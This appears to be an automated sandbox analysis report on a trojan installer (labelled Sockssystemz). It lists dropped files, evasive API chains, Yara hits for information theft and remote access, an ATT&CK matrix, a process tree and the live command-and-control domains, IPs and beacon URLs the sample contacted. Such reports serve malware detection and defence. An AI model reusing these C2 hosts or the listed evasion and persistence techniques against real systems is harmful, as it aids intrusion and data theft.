Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QQL7E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DTLCM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KU7UG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RGK44.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ2FQ.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5694
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-16392
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep count: 2634 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep time: -5268000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 4536Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep count: 7327 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep time: -14654000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeThread delayed: delay time: 60000Jump to behavior
                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: crtgame.exe, 00000007.00000002.3299995322.00000000008C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeAPI call chain: ExitProcess graph end nodegraph_0-6734
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2853
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2860
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_7-16394
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02C5FBBE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02C5FBBE
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C45F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,7_2_02C45F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C58F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02C58F28
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C57A6D cpuid 7_2_02C57A6D
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: GetLocaleInfoA,0_2_004051FC
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: GetLocaleInfoA,0_2_00405248
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: GetLocaleInfoA,1_2_00408570
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: GetLocaleInfoA,1_2_004085BC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

Stealing of Sensitive Information

Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp, type: DROPPED
Source: Yara match | File source: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 7156, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp, type: DROPPED
Source: Yara match | File source: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 7156, type: MEMORYSTR

MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 4 Windows Service | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Scheduled Task/Job | 1 Access Token Manipulation | 23 Software Packing | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Bootkit | 4 Windows Service | 1 DLL Side-Loading | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | 112 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 3 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Bootkit | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph

Behavior Graph ID: 1575089 | Sample: AGcC2uK0El.exe | Startdate: 14/12/2024 | Architecture: WINDOWS | Score: 100
Signatures on the start node: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 9 other signatures

Process tree:
AGcC2uK0El.exe (started)
    dropped: C:\Users\user\AppData\...\AGcC2uK0El.tmp, PE32
    AGcC2uK0El.tmp (started)
        dropped: C:\Program Files (x86)\CRTGame\crtgame.exe, PE32
        dropped: C:\Program Files (x86)\...\is-PJ8MN.tmp, PE32
        dropped: C:\Program Files (x86)\...\is-EATSP.tmp, PE32
        dropped: 106 other files (none is malicious)
        signature: Uses schtasks.exe or at.exe to add and modify task schedules
        crtgame.exe (started)
            network: gpatxul.com 185.237.206.129, 49911, 49923, 49929, ITLDC-NLUA Ukraine
            network: bmpkywz.com 94.232.249.187, 49818, 49849, 49879, INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic
            network: 46.8.225.74, 2023, 49914, 49928, FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation
        net.exe (started)
            conhost.exe (started)
            net1.exe (started)
        crtgame.exe (started)
            dropped: C:\ProgramData\...\SHelperTrack.exe, PE32
        schtasks.exe (started)
            conhost.exe (started)

Initial Sample

Source | Detection | Scanner | Label
AGcC2uK0El.exe | 58% | Virustotal |
AGcC2uK0El.exe | 55% | ReversingLabs | Win32.Trojan.Sockssystemz
AGcC2uK0El.exe | 100% | Avira | HEUR/AGEN.1332570

Dropped Files

Source | Detection | Scanner | Label
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy) | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-2V0OO.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-4CPU3.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-5JD36.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-5QDBA.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-6S6NV.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-8DLTN.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-8JJ67.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-9A8PJ.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-AMJ3K.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-CHRTV.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-D10RQ.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-DG85B.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-DTLCM.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-E5NVS.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-FBHNA.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-GN0SC.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-H6A9P.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-HLDR5.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-I1OEI.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-I5CC7.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-J56NG.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-JISVL.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp | 3% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-JU8A8.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-KU7UG.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-LP9D8.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-LVBK5.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp | 3% | ReversingLabs |
                  No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 | 0% | Avira URL Cloud | safe
http://185.237.206.129/en-GB | 0% | Avira URL Cloud | safe
http://www.mp3dev.org/ID3Error | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svn/trunk | 0% | Avira URL Cloud | safe
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2 | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svnrepository | 0% | Avira URL Cloud | safe
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde | 0% | Avira URL Cloud | safe
http://185.237.206.129/ | 0% | Avira URL Cloud | safe
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde | 0% | Avira URL Cloud | safe
http://www.mpg123.de | 0% | Avira URL Cloud | safe
http://lame.sf.net | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svn/trunkrepository | 0% | Avira URL Cloud | safe
gpatxul.com | 0% | Avira URL Cloud | safe
http://mingw-w64.sourceforge.net/X | 0% | Avira URL Cloud | safe
http://bmpkywz.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 | 0% | Avira URL Cloud | safe
http://LosslessAudio.org/0 | 0% | Avira URL Cloud | safe
http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 | 0% | Avira URL Cloud | safe
http://94.232.249.187/ | 0% | Avira URL Cloud | safe
http://lame.sf.net32bits | 0% | Avira URL Cloud | safe
http://www.mp3dev.org/ | 0% | Avira URL Cloud | safe
http://ocsps.ssl.com0Q | 0% | Avira URL Cloud | safe
https://mp4v2.googlecode.com/svn | 0% | Avira URL Cloud | safe

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
gpatxul.com | 185.237.206.129 | true | true | | unknown
bmpkywz.com | 94.232.249.187 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 | true | Avira URL Cloud: safe | unknown
http://gpatxul.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 | true | Avira URL Cloud: safe | unknown
gpatxul.com | true | Avira URL Cloud: safe | unknown
http://bmpkywz.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.dr | false | | high
https://gcc.gnu.org/bugs/): | is-H6A9P.tmp.1.dr | false | | high
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0 | is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | false | | high
https://mp4v2.googlecode.com/svn/trunk | is-ODQUV.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | false | | high
http://185.237.206.129/en-GB | crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.sectigo.com0 | is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | false | | high
http://www.mp3dev.org/ID3Error | is-GN0SC.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde | crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
